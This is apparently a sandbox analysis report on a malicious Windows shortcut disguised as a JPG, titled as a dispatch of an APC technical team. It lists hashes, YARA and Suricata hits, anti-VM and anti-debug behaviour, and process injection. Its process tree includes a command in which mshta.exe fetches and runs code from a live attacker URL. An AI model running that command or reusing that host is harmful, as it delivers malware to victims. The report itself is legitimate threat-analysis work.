Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
11.20 09:11
mainbas.bat
11.20 09:11
dll007.dll
11.20 09:11
exe004.exe
11.20 09:11
exe010.exe
11.20 09:11
blecher.exe
11.20 09:11
GetAdapterInfo.exe
11.20 09:11
dll004.dll
11.20 09:11
dll008.dll
11.20 09:11
bestthingsalwaysgetbes...
11.20 09:11
DKM-9067291.pdf.lnk

Latest News
11.20 09:11
Malicious QR codes
11.20 09:11
Vista Said to Near Log...
11.20 09:11
Microsoft Launches Win...
11.20 09:11
Enhancing Cyber Resili...
11.20 09:11
VCs Look to Secondary ...
11.20 09:11
An Animated Walkthroug...
11.20 08:11
Apple, Oracle, and Apa...
11.20 08:11
NHIs Are the Future of...
11.20 08:11
Hasbro’s Gamer CEO Ref...
11.20 08:11
Threat Assessment: Ign...

Summary | ZeroBOX

Dispatch of the APC HMLTV technical team.jpg.lnk

Generic Malware AntiVM Lnk Format AntiDebug GIF Format

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 15, 2024, 8:10 a.m.	June 15, 2024, 8:12 a.m.

Size	2.3KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=67, Archive, ctime=Sat Dec 7 00:09:39 2019, mtime=Thu Jun 6 00:34:16 2024, atime=Sat Dec 7 00:09:39 2019, length=14848, window=hide
MD5	`73a0170ea882989f6ffc3b4726a3ee56`
SHA256	`960d08384896ca7a160371f7e19b15d804f225d242cade03f55f387cf69e7f15`
CRC32	`3BBF0763`
ssdeep	`24:8l4BbC6MN4Rn8Ae+AIYf+/+P+kUTibI0ava8CaL4I0kXQaR3+szmCGO+/Mm:8SB0S1NAIYBPj7IBaja0InXv3cvOX`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "oOjNfSZdvkXmLCXS" "C:\Users\test22\AppData\Local\Temp\Dispatch of the APC HMLTV technical team.jpg.lnk"
884
- mshta.exe "C:\Windows\System32\mshta.exe" "https://mailnepalarmymil.mods.email/dispachofapc-46703841?yui=0"
  2076

Name	Response	Post-Analysis Lookup
mailnepalarmymil.mods.email	A 91.223.208.175	91.223.208.175
x1.i.lencr.org	CNAME crl.root-x1.letsencrypt.org.edgekey.net CNAME e8652.dscx.akamaiedge.net A 23.41.113.9	23.52.33.11

IP Address	Status	Action
164.124.101.2	Active	Moloch
23.41.113.9	Active	Moloch
91.223.208.175	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49164 -> 91.223.208.175:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 91.223.208.175:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49164 91.223.208.175:443	C=US, O=Let's Encrypt, CN=R3	CN=*.mods.email	b8:66:ff:f2:98:5b:cd:cf:73:a4:d4:6b:9c:dd:ac:4f:a6:55:f0:cc
TLSv1 192.168.56.103:49169 91.223.208.175:443	None	None	None

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 15, 2024, 8:10 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET http://x1.i.lencr.org/
request	GET https://mailnepalarmymil.mods.email/dispachofapc-46703841?yui=0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Dispatch of the APC HMLTV technical team.jpg.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\mshta.exe" "https://mailnepalarmymil.mods.email/dispachofapc-46703841?yui=0"

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 15, 2024, 8:10 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 15, 2024, 8:10 a.m.	flags: 15 family: 0		111	0

Yara rule detected in process memory (8 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA June 15, 2024, 8:10 a.m.	key_handle: 0x000002bc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 884 resumed a thread in remote process 2076
NtResumeThread June 15, 2024, 8:10 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2076	1	0	0